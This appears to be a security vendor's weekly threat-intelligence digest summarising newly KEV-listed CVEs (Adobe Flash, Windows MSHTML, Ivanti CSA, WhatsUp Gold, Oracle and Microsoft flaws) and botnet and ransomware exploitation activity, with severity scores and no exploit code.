This week, the CISA KEV list expanded with 11 new CVEs, four of which are ancient vulnerabilities tied to Adobe Flash Player. Despite being over ten years old, these vulnerabilities CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648 have resurfaced with renewed urgency, highlighting a persistent threat that continues to jeopardize security.
Microsoft has confirmed that the spoofing vulnerability CVE-2024-43461, affecting Windows MSHTML, was exploited by the Void Banshee threat actor as part of an attack chain to deliver Atlantida malware. In addition to this, two older Microsoft CVEs, CVE-2020-0618 and CVE-2019-1069, were also added to the CISA KEV list highlighting the ongoing security risks associated with outdated software.
Ivanti faced a tough week as two critical vulnerabilities, CVE-2024-8963 and CVE-2024-8190, affecting its Cloud Services Appliance were actively exploited in the wild and added to the CISA KEV list.
The Mirai botnet is ramping up its aggressive exploitation efforts, persistently targeting LB-Link BL devices and TP-Link Archer AX21 routers. Meanwhile, the IoT_Reaper botnet remains operational, continuously taking advantage of an eight-year-old vulnerability in MVPower CCTV DVR models.
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
CVE-2024-43461
A high severity spoofing vulnerability in the Windows MSHTML platform, rated with an EPSS score of 0.16239, has been leveraged by the Void Banshee threat actor group to deploy Atlantida malware. This vulnerability is now on the CISA Known Exploited Vulnerabilities (KEV) list, underscoring its importance and the necessity for prompt mitigation.
CVE-2024-6670
A critical SQL injection vulnerability in WhatsUp Gold, scoring 0.95634 on the EPSS, enables attackers to bypass authentication and access encrypted user passwords without needing credentials. This issue has been included in the CISA Known Exploited Vulnerabilities (KEV) list, highlighting the urgent need for remediation due to the presence of an active proof-of-concept (POC) exploit.
CVE-2024-27348
Recently added to CISA’s Known Exploited Vulnerabilities (KEV), the critical flaw in Apache HugeGraph-server, with a CVSS score of 9.8 and a low EPSS score of 0.0021 enables authenticated attackers to execute arbitrary code on the affected server with SYSTEM privileges.
CVE-2024-8963
A critical path traversal vulnerability in the Ivanti Cloud Services Appliance, with a CVSS score of 9.8, allows remote authenticated attackers to access restricted functionality on vulnerable systems. This vulnerability was recently added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its severity.
CVE-2024-8190
A critical OS command injection vulnerability in the Ivanti Cloud Service Appliance, with an EPSS score of 0.15116, permits remote authenticated attackers to execute code remotely. It has also been listed recently in the CISA Known Exploited Vulnerabilities (KEV) catalog.
CVE-2022-21445
A critical remote code execution vulnerability in Oracle JDeveloper, rated CVSS 9.8 with an EPSS score of 0.00705, allows attackers to execute arbitrary code on vulnerable systems. This flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) list for prioritized remediation.
CVE-2020-14644
A critical impact remote code execution vulnerability in Oracle WebLogic Server, rated CVSS 9.8 with an EPSS score of 0.04636, has been exploited in the wild, allowing attackers to gain full control of affected systems. It has been added to the CISA KEV list for critical response.
CVE-2020-0618
A high-severity remote code execution vulnerability in Microsoft SQL Server, recently added to the CISA KEV list, carries a high EPSS score of 0.97335. It enables attackers to execute arbitrary code within the context of the Report Server service account, posing a significant security risk.
CVE-2019-1069
A high-severity elevation of privilege vulnerability in Microsoft Windows Task Scheduler, with a low EPSS score of 0.00434, was previously exploited by Conti and Ryuk ransomware. This vulnerability has recently been added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its continued risk.
CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648
Persistent high-severity vulnerabilities in Adobe Flash Player, dating back a decade, still pose a serious risk by allowing remote attackers to run arbitrary code on compromised systems. The CISA Known Exploited Vulnerabilities (KEV) list has now been updated to include these vulnerabilities, underscoring the critical need for immediate mitigation.
Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.
Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.
We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.
CVE-2024-43461
According to recent findings by The Register, the Void Banshee threat actor exploited this spoofing vulnerability in Windows MSHTML as a zero-day to deploy Atlantida malware. This attack was part of a broader exploit chain that included CVE-2024-38112, another spoofing flaw.
CVE-2023-48788
Recent investigations by Bitdefender revealed that this critical SQL injection vulnerability in Fortinet's EMS systems was exploited by Medusa ransomware to gain initial access.
It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.